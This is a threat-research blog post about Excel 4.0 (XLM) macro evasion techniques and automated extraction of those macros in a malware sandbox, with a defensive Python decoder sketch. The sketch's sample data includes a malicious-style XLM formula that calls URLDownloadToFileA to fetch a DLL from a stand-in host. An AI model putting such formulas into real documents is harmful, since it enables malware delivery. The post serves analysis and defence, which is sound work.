More Excel 4.0 XLM Extraction

Introduction

This week we’re back with more information on XLM (Excel 4.0) Macros, and our progress on extracting these automatically during Triage analysis. If you haven’t already read our first blogpost on this subject, you can check that out here.

As usual, once we started digging into the subject we rather fell down the rabbit hole, finding a whole host of ways in which XLM macros are being leveraged maliciously. In last week’s post we covered what could be considered the more straightforward types of XLM macros and demonstrated Triage’s new extractor. Today we released an update to it, adding support for a range of additional XLM macro-enabled Office documents.

Overall, quite a lot has been happening in the space of XLM-enabled macro documents. Read on below for examples of these files and links to relevant Triage analyses!

Latest in XLM macros

Some samples have started using encrypted Office documents, a technique that has been discussed for several years already. The encryption primarily makes static analysis (Yara rules, for example) harder to apply; once the document is decrypted it’s the same old game.

http://www.pwncode.io/2020/04/xlm-hidden-macrosheets-used-for-evasion.html

Here is an example analysis from one of the files discussed in the blogpost:

https://tria.ge/reports/200410-tmzpvazbjn/static1

Some XLM documents have started activating on specific days or, more accurately, deactivating after the intended distribution date.

For these cases we’ve implemented a rather basic “day recovery” mechanism that automatically resolves the correct day, and thus the encryption key, and extracts the formulas from there. For example:

https://tria.ge/reports/200415-ge3z646ttx/static1

Another inconvenient feature of this document is that it dynamically crafts the formula to be executed, and that formula in turn refers to the URL (the one passed to URLDownloadToFileA) through an R1C1-style cell reference. In other words, the XLM parser and interpreter need to be fully aware of the surrounding cells.
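As an added illustration (our own sketch, not Triage’s extractor code), the following Python combines the two ideas above: a “day recovery” loop that tries every day of the month and keeps the candidate that decodes to XLM-looking text, and an R1C1 resolver that substitutes referenced cell values into the recovered formula. The per-day key derivation, the XOR obfuscation and the sample cells are constructed stand-ins; the schemes in real documents are sample-specific.

```python
import re

# Well-known XLM function names; a decoded candidate scores by how many appear.
XLM_MARKERS = ("CALL(", "EXEC(", "FORMULA(", "REGISTER(", "HALT(", "URLDownloadToFileA")
R1C1_REF = re.compile(r"\bR(\d+)C(\d+)\b")


def day_key(day):
    """Constructed stand-in for a key derived from the day of the month."""
    return (day * 7 + 3) & 0xFF


def xor_decode(blob, key):
    """Constructed stand-in for the document's obfuscation: single-byte XOR."""
    return bytes(b ^ key for b in blob).decode("latin-1")


def score(text):
    return sum(text.count(marker) for marker in XLM_MARKERS)


def recover_day(blob):
    """Try every day of the month and keep the candidate that looks most like XLM."""
    best_day = max(range(1, 32), key=lambda d: score(xor_decode(blob, day_key(d))))
    return best_day, xor_decode(blob, day_key(best_day))


def resolve_r1c1(formula, cells):
    """Replace absolute R1C1 references outside string literals with the cell's value."""
    def value(match):
        cell = cells.get((int(match.group(1)), int(match.group(2))), "")
        return '"%s"' % cell if isinstance(cell, str) else str(cell)
    parts = formula.split('"')
    for i in range(0, len(parts), 2):   # even-indexed parts lie outside quotes
        parts[i] = R1C1_REF.sub(value, parts[i])
    return '"'.join(parts)


# Constructed sample: a sheet whose cell R1C1 holds the download URL and whose
# payload formula was XOR-obfuscated with the key for day 15.
SAMPLE_CELLS = {(1, 1): "http://example.invalid/payload.dll"}
SAMPLE_PLAIN = '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R1C1,"payload.dll",0,0)'
SAMPLE_BLOB = bytes(b ^ day_key(15) for b in SAMPLE_PLAIN.encode("latin-1"))

if __name__ == "__main__":
    day, formula = recover_day(SAMPLE_BLOB)
    print("recovered day:", day)
    print("resolved formula:", resolve_r1c1(formula, SAMPLE_CELLS))
```

The marker-based scoring is the part that carries over to real samples: whatever the key schedule, a correct guess is the one that yields recognisable XLM function calls.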

Continuing on that topic, more recent samples have started adding document and cell properties (such as the number of rows, the number of columns, the font size, etc.) as input variables for the encryption key. See also the following tweet with accompanying analysis.

Our analysis on tria.ge:

https://tria.ge/reports/200415-y6k7zj694a/static1

Future Work

We’re currently looking into a couple of other new XLM macro capabilities that have appeared over the past day or two, e.g. embedding XLM macros in Office 2007+ documents.

Some IoCs

Following are a number of new IoCs based on public submissions to https://tria.ge/ as well as our own continuous research.


Conclusion

Every day we see new XLM document variants being released, and we’re making sure Triage handles and detonates all of them properly.

We’re doing our very best to be on top of all of these techniques and to show you the results in a high-level manner. After all, it is our goal with Hatching Triage to make automated malware analysis easy, simple, and affordable to use.
